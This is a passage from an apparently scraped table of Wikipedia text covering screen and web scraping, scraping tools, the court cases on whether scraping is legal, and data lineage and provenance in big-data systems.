require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
49 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-2 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
50 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Special:BookSources/9781595936097 | This page allows users to search multiple sources for a book given a 10 or 13 digit International Standard Book Number. Spaces and dashes in the ISBN do not matter. This page links to catalogs of libraries, booksellers, and other book sources where you will be able to search for the book by its International Standard Book Number (ISBN). Google Books and Amazon.com may be helpful if you want to verify citations in Wikipedia articles, because they often let you search an online version of the book for specific words or phrases, or you can browse through the book (although for copyright reasons the entire book is usually not available). At the Open Library (part of the Internet Archive) you can borrow and read entire books online. Alabama California Colorado Connecticut Delaware Florida Georgia Illinois Indiana Iowa Kansas Kentucky Massachusetts Michigan Minnesota Missouri Nebraska New Jersey New Mexico New York North Carolina Ohio Oklahoma Oregon Pennsylvania Rhode Island South Carolina South Dakota Tennessee Texas Utah Washington state Wisconsin Find your book on a site that compiles results from other online sites: These sites allow you to search the catalogs of many individual booksellers: If the book you are looking for is in a language other than English, you might find it helpful to look at the equivalent pages on other Wikipedias, linked below they are more likely to have sources appropriate for that language. The WorldCat xISBN tool for finding other editions is no longer available. However, there is often a "view all editions" link on the results page from an ISBN search. Google books often lists other editions of a book and related books under the "about this book" link. You can convert between 10 and 13 digit ISBNs with these tools: Get free access to research Research tools and services Outreach Get involved |
51 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Category:Web_scraping | This category has only the following subcategory. The following 31 pages are in this category, out of 31 total. This list may not reflect recent changes. |
52 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_lineage | Data lineage includes the data origin, what happens to it, and where it moves over time. 1 Data lineage provides visibility and simplifies tracing errors back to the root cause in a data analytics process. 2 It also enables replaying specific portions or inputs of the data flow for step-wise debugging or regenerating lost output. Database systems use such information, called data provenance, to address similar validation and debugging challenges. 3 Data provenance refers to records of the inputs, entities, systems, and processes that influence data of interest, providing a historical record of the data and its origins. The generated evidence supports forensic activities such as data-dependency analysis, error compromise detection and recovery, auditing, and compliance analysis. "Lineage is a simple type of why provenance. 3 Data lineage can be represented visually to discover the data flow movement from its source to destination via various changes and hops on its way in the enterprise environment, how the data gets transformed along the way, how the representation and parameters change, and how the data splits or converges after each hop. A simple representation of the Data Lineage can be shown with dots and lines, where dot represents a data container for data points and lines connecting them represents the transformations the data point undergoes, between the data containers. Representation broadly depends on the scope of the metadata management and reference point of interest. Data lineage provides sources of the data and intermediate data flow hops from the reference point with backward data lineage, leading to the final destination's data points and its intermediate data flows with forward data lineage. These views can be combined with end-to-end lineage for a reference point that provides a complete audit trail of that data point of interest from sources to their final destinations. As the data points or hops increase, the complexity of such representation becomes incomprehensible. Thus, the best feature of the data lineage view would be to be able to simplify the view by temporarily masking unwanted peripheral data points. Tools that have the masking feature enable scalability of the view and enhance analysis with the best user experience for both technical and business users. Data lineage also enables companies to trace sources of specific business data for the purposes of tracking errors, implementing changes in processes, and implementing system migrations to save significant amounts of time and resources, thereby tremendously improving BI efficiency. 4 The scope of the data lineage determines the volume of metadata required to represent its data lineage. Usually, data governance, and data management determines the scope of the data lineage based on their regulations, enterprise data management strategy, data impact, reporting attributes, and critical data elements of the organization. Data lineage provides the audit trail of the data points at the highest granular level, but presentation of the lineage may be done at various zoom levels to simplify the vast information, similar to analytic web maps. Data Lineage can be visualized at various levels based on the granularity of the view. At a very high level data lineage provides what systems the data interacts before it reaches destination. As the granularity increases it goes up to the data point level where it can provide the details of the data point and its historical behavior, attribute properties, and trends and data quality of the data passed through that specific data point in the data lineage. Data governance plays a key role in metadata management for guidelines, strategies, policies, implementation. Data quality, and master data management helps in enriching the data lineage with more business value. Even though the final representation of data lineage is provided in one interface but the way the metadata is harvested and exposed to the data lineage graphical user interface could be entirely different. Thus, data lineage can be broadly divided into three categories based on the way metadata is harvested: data lineage involving software packages for structured data, programming languages, and big data. Data lineage information includes technical metadata involving data transformations. Enriched data lineage information may include data quality test results, reference data values, data models, business vocabulary, data stewards, program management information, and enterprise information systems linked to the data points and transformations. Masking feature in the data lineage visualization allows the tools to incorporate all the enrichments that matter for the specific use case. To represent disparate systems into one common view, "metadata normalization" or standardization may be necessary. Distributed systems like Google Map Reduce, 5 Microsoft Dryad, 6 Apache Hadoop 7 (an open-source project) and Google Pregel 8 provide such platforms for businesses and users. However, even with these systems, big data analytics can take several hours, days or weeks to run, simply due to the data volumes involved. For example, a ratings prediction algorithm for the Netflix Prize challenge took nearly 20 hours to execute on 50 cores, and a large-scale image processing task to estimate geographic information took 3 days to complete using 400 cores. 9 "The Large Synoptic Survey Telescope is expected to generate terabytes of data every night and eventually store more than 50 petabytes, while in the bioinformatics sector, the largest genome 12 sequencing houses in the world now store petabytes of data apiece. 10 It is very difficult for a data scientist to trace an unknown or an unanticipated result. Big data analytics is the process of examining large data sets to uncover hidden patterns, unknown correlations, market trends, customer preferences and other useful business information. They apply machine learning algorithms etc. to the data which transforms the data. Due to the humongous size of the data, there could be unknown features in the data, possibly even outliers. It is pretty difficult for a data scientist to actually debug an unexpected result. The massive scale and unstructured nature of data, the complexity of these analytics pipelines, and long runtimes pose significant manageability and debugging challenges. Even a single error in these analytics can be extremely difficult to identify and remove. While one may debug them by re-running the entire analytics through a debugger for step-wise debugging, this can be expensive due to the amount of time and resources needed. Auditing and data validation are other major problems due to the growing ease of access to relevant data sources for use in experiments, sharing of data between scientific communities and use of third-party data in business enterprises. 11 12 13 14 These problems will only become larger and more acute as these systems and data continue to grow. As such, more cost-efficient ways of analyzing data intensive scalable computing (DISC) are crucial to their continued effective use. According to an EMC IDC study: 15 Working with this scale of data has become very challenging. Unstructured data usually refers to information that doesn't reside in a traditional row-column database. Unstructured data files often include text and multimedia content. Examples include e-mail messages, word processing documents, videos, photos, audio files, presentations, webpages and many other kinds of business documents. Note that while these sorts of files may have an internal structure, they are still considered "unstructured" because the data they contain doesn't fit neatly in a database. Experts estimate that 80 to 90 percent of the data in any organization is unstructured. And the amount of unstructured data in enterprises is growing significantly often many times faster than structured databases are growing. "Big data can include both structured and unstructured data, but IDC estimates that 90 percent of big data is unstructured data. 16 The fundamental challenge of unstructured data sources is that they are difficult for non-technical business users and data analysts alike to unbox, understand, and prepare for analytic use. Beyond issues of structure, is the sheer volume of this type of data. Because of this, current data mining techniques often leave out valuable information and make analyzing unstructured data laborious and expensive. 17 In today's competitive business environment, companies have to find and analyze the relevant data they need quickly. The challenge is going through the volumes of data and accessing the level of detail needed, all at a high speed. The challenge only grows as the degree of granularity increases. One possible solution is hardware. Some vendors are using increased memory and parallel processing to crunch large volumes of data quickly. Another method is putting data in-memory but using a grid computing approach, where many machines are used to solve a problem. Both approaches allow organizations to explore huge data volumes. Even this level of sophisticated hardware and software, few of the image processing tasks in large scale take a few days to few weeks. 18 Debugging of the data processing is extremely hard due to long run times. A third approach of advanced data discovery solutions combines self-service data prep with visual data discovery, enabling analysts to simultaneously prepare and visualize data side-by-side in an interactive analysis environment offered by newer companies Trifacta, Alteryx and others. 19 Another method to track data lineage is spreadsheet programs such as Excel that do offer users cell-level lineage, or the ability to see what cells are dependent on another, but the structure of the transformation is lost. Similarly, ETL or mapping software provide transform-level lineage, yet this view typically doesn't display data and is too coarse-grained to distinguish between transforms that are logically independent (e.g. transforms that operate on distinct columns) or dependent. 20 Big Data platforms have a very complicated structure. Data is distributed among several machines. Typically the jobs are mapped into several machines and results are later combined by reduce operations. Debugging of a big data pipeline becomes very challenging because of the very nature of the system. It will not be an easy task for the data scientist to figure out which machine's data has the outliers and unknown features causing a particular algorithm to give unexpected results. Data provenance or data lineage can be used to make the debugging of big data pipeline easier. This necessitates the collection of data about data transformations. The below section will explain data provenance in more detail. Scientific data provenance provides a historical record of the data and its origins. The provenance of data which is generated by complex transformations such as workflows is of considerable value to scientists. 21 From it, one can ascertain the quality of the data based on its ancestral data and derivations, track back sources of errors, allow automated re-enactment of derivations to update a data, and provide attribution of data sources. Provenance is also essential to the business domain where it can be used to drill down to the source of data in a data warehouse, track the creation of intellectual property, and provide an audit trail for regulatory purposes. The use of data provenance is proposed in distributed systems to trace records through a dataflow, replay the dataflow on a subset of its original inputs and debug data flows. To do so, one needs to keep track of the set of inputs to each operator, which were used to derive each of its outputs. Although there are several forms of provenance, such as copy-provenance and how-provenance, 14 22 the information we need is a simple form of why-provenance, or lineage, as defined by Cui et al. 23 PROV is a W3C recommendation of 2013, Intuitively, for an operator T producing output o, lineage consists of triplets of form I, T, o , where I is the set of inputs to T used to derive o. Capturing lineage for each operator T in a dataflow enables users to ask questions such as “Which outputs were produced by an input i on operator T ? and “Which inputs produced output o in operator T ? 3 A query that finds the inputs deriving an output is called a backward tracing query, while one that finds the outputs produced by an input is called a forward tracing query. 26 Backward tracing is useful for debugging, while forward tracing is useful for tracking error propagation. 26 Tracing queries also form the basis for replaying an original dataflow. 12 23 26 However, to efficiently use lineage in a DISC system, we need to be able to capture lineage at multiple levels (or granularities) of operators and data, capture accurate lineage for DISC processing constructs and be able to trace through multiple dataflow stages efficiently. DISC system consists of several levels of operators and data, and different use cases of lineage can dictate the level at which lineage needs to be captured. Lineage can be captured at the level of the job, using files and giving lineage tuples of form IF i, M RJob, OF i , lineage can also be captured at the level of each task, using records and giving, for example, lineage tuples of form (k rr, v rr ), map, (k m, v m ) . The first form of lineage is called coarse-grain lineage, while the second form is called fine-grain lineage. Integrating lineage across different granularities enables users to ask questions such as “Which file read by a MapReduce job produced this particular output record? and can be useful in debugging across different operator and data granularities within a dataflow. 3 To capture end-to-end lineage in a DISC system, we use the Ibis model, 27 which introduces the notion of containment hierarchies for operators and data. Specifically, Ibis proposes that an operator can be contained within another and such a relationship between two operators is called operator containment. "Operator containment implies that the contained (or child) operator performs a part of the logical operation of the containing (or parent) operator. 3 For example, a MapReduce task is contained in a job. Similar containment relationships exist for data as well, called data containment. Data containment implies that the contained data is a subset of the containing data (superset). The concept of prescriptive data lineage combines the logical model (entity) of how that data should flow with the actual lineage for that instance. 28 The terms 'data lineage' and 'provenance' generally describe the sequence of steps or processes through which a dataset has passed to reach its current state. However, looking back at the audit or log correlations to determine the lineage from a forensic point of view fails for certain data management cases. For instance, it is impossible to determine with certainty if the route a data workflow took was correct or in compliance without the logic model. Only by combining a logical model with atomic forensic events can proper activities be validated: Many certified compliance reports require provenance of data flow as well as the end state data for a specific instance. With these types of situations, any deviation from the prescribed path need to be accounted and potentially remediated. 29 This marks a shift from purely "looking back" to a framework, which is better suited to capture compliance workflows. Lazy lineage collection typically captures only coarse-grain lineage at run time. These systems incur low capture overheads due to the small amount of lineage they capture. However, to answer fine-grain tracing queries, they must replay the data flow on all (or a large part) of its input and collect fine-grain lineage during the replay. This approach is suitable for forensic systems, where a user wants to debug an observed bad output. Active collection systems capture entire lineage of the data flow at run time. The kind of lineage they capture may be coarse-grain or fine-grain, but they do not require any further computations on the data flow after its execution. Active fine-grain lineage collection systems incur higher capture overheads than lazy collection systems. However, they enable sophisticated replay and debugging. 3 An actor is an entity that transforms data; it may be a Dryad vertex, individual map and reduce operators, a MapReduce job, or an entire dataflow pipeline. Actors act as black-boxes and the inputs and outputs of an actor are tapped to capture lineage in the form of associations, where an association is a triplet i, T, o that relates an input i with an output o for an actor T . The instrumentation thus captures lineage in a dataflow one actor at a time, piecing it into a set of associations for each actor. The system developer needs to capture the data an actor reads (from other actors) and the data an actor writes (to other actors). For example, a developer can treat the Hadoop Job Tracker as an actor by recording the set of files read and written by each job. 30 Association is a combination of the inputs, outputs and the operation itself. The operation is represented in terms of a black box also known as the actor. The associations describe the transformations that are applied on the data. The associations are stored in the association tables. Each unique actor is represented by its own association table. An association itself looks like i, T, o where i is the set of inputs to the actor T and o is set of outputs given produced by the actor. Associations are the basic units of Data Lineage. Individual associations are later clubbed together to construct the entire history of transformations that were applied to the data. 3 Big data systems scale horizontally i.e. increase capacity by adding new hardware or software entities into the distributed system. The distributed system acts as a single entity in the logical level even though it comprises multiple hardware and software entities. The system should continue to maintain this property after horizontal scaling. An important advantage of horizontal scalability is that it can provide the ability to increase capacity on the fly. The biggest plus point is that horizontal scaling can be done using commodity hardware. The horizontal scaling feature of Big Data systems should be taken into account while creating the architecture of lineage store. This is essential because the lineage store itself should also be able to scale in parallel with the Big data system. The number of associations and amount of storage required to store lineage will increase with the increase in size and capacity of the system. The architecture of Big data systems makes the use of a single lineage store not appropriate and impossible to scale. The immediate solution to this problem is to distribute the lineage store itself. 3 The best-case scenario is to use a local lineage store for every machine in the distributed system network. This allows the lineage store also to scale horizontally. In this design, the lineage of data transformations applied to the data on a particular machine is stored on the local lineage store of that specific machine. The lineage store typically stores association tables. Each actor is represented by its own association table. The rows are the associations themselves and columns represent inputs and outputs. This design solves 2 problems. It allows horizontal scaling of the lineage store. If a single centralized lineage store was used, then this information had to be carried over the network, which would cause additional network latency. The network latency is also avoided by the use of a distributed lineage store. 30 The information stored in terms of associations needs to be combined by some means to get the data flow of a particular job. In a distributed system a job is broken down into multiple tasks. One or more instances run a particular task. The results produced on these individual machines are later combined together to finish the job. Tasks running on different machines perform multiple transformations on the data in the machine. All the transformations applied to the data on a machines is stored in the local lineage store of that machines. This information needs to be combined together to get the lineage of the entire job. The lineage of the entire job should help the data scientist understand the data flow of the job and he she can use the data flow to debug the big data pipeline. The data flow is reconstructed in 3 stages. The first stage of the data flow reconstruction is the computation of the association tables. The association tables exists for each actor in each local lineage store. The entire association table for an actor can be computed by combining these individual association tables. This is generally done using a series of equality joins based on the actors themselves. In few scenarios the tables might also be joined using inputs as the key. Indexes can also be used to improve the efficiency of a join. The joined tables need to be stored on a single instance or a machine to further continue processing. There are multiple schemes that are used to pick a machine where a join would be computed. The easiest one being the one with minimum CPU load. Space constraints should also be kept in mind while picking the instance where join would happen. The second step in data flow reconstruction is computing an association graph from the lineage information. The graph represents the steps in the data flow. The actors act as vertices and the associations act as edges. Each actor T is linked to its upstream and downstream actors in the data flow. An upstream actor of T is one that produced the input of T, while a downstream actor is one that consumes the output of T . Containment relationships are always considered while creating the links. The graph consists of three types of links or edges. The simplest link is an explicitly specified link between two actors. These links are explicitly specified in the code of a machine learning algorithm. When an actor is aware of its exact upstream or downstream actor, it can communicate this information to lineage API. This information is later used to link these actors during the tracing query. For example, in the MapReduce architecture, each map instance knows the exact record reader instance whose output it consumes. 3 Developers can attach data flow archetypes to each logical actor. A data flow archetype explains how the children types of an actor type arrange themselves in a data flow. With the help of this information, one can infer a link between each actor of a source type and a destination type. For example, in the MapReduce architecture, the map actor type is the source for reduce, and vice versa. The system infers this from the data flow archetypes and duly links map instances with reduce instances. However, there may be several MapReduce jobs in the data flow, and linking all map instances with all reduce instances can create false links. To prevent this, such links are restricted to actor instances contained within a common actor instance of a containing (or parent) actor type. Thus, map and reduce instances are only linked to each other if they belong to the same job. 3 In distributed systems, sometimes there are implicit links, which are not specified during execution. For example, an implicit link exists between an actor that wrote to a file and another actor that read from it. Such links connect actors which use a common data set for execution. The dataset is the output of the first actor and is the input of the actor following it. 3 The final step in the data flow reconstruction is the topological sorting of the association graph. The directed graph created in the previous step is topologically sorted to obtain the order in which the actors have modified the data. This inherit order of the actors defines the data flow of the big data pipeline or task. This is the most crucial step in big data debugging. The captured lineage is combined and processed to obtain the data flow of the pipeline. The data flow helps the data scientist or a developer to look deeply into the actors and their transformations. This step allows the data scientist to figure out the part of the algorithm that is generating the unexpected output. A big data pipeline can go wrong in two broad ways. The first is a presence of a suspicious actor in the data-flow. The second being the existence of outliers in the data. The first case can be debugged by tracing the data-flow. By using lineage and data-flow information together a data scientist can figure out how the inputs are converted into outputs. During the process actors that behave unexpectedly can be caught. Either these actors can be removed from the data flow or they can be augmented by new actors to change the data-flow. The improved data-flow can be replayed to test the validity of it. Debugging faulty actors include recursively performing coarse-grain replay on actors in the data-flow, 31 which can be expensive in resources for long dataflows. Another approach is to manually inspect lineage 